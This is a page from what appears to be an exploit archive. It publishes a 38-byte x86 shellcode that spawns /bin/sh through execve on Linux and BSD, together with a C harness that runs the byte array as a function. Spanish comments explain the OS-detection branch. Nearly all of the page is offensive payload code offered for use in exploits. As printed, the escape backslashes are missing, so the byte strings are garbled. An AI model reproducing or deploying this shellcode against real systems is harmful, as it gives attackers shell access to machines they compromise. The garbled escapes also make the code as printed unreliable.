[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 bsd/x86 execve /bin/sh 38 bytes
# Published : 2004-09-12
# Author : dymitri
# Previous Title : linux/x86 unix/SPARC execve /bin/sh 80 bytes
# Next Title : MS Windows (DCOM RPC2) Universal Shellcode
/*
* Linux/x86 and Bsd/x86
*
* execve() of /bin/sh by dymitri!!!
*
*/
#include <stdio.h>
char
code[] =
"x31xc0"
"x50"
"x68x2fx2fx73x68"
"x68x2fx62x69x6e"
"x89xe3"
"x50"
"x54"
"x53"
"x50"
"x8cxe0"
"x21xc0"
"x74x04"
"xb0x3b"
"xebx07" /* si es bsd saltamos los 7 bytes para llegar al int $0x80 */
"xb0x0b"
"x99" /* En caso contrario si %fs es igual a 0 configuramos para que la ejecucion sea sobre linux */
"x52"
"x53"
"x89xe1"
"xcdx80";
main()
{
void (*s)() = (void *)code;
printf("Shellcode length: %dnExecuting..nn",
strlen(code));
s();
}
// www.Syue.com [2004-09-12]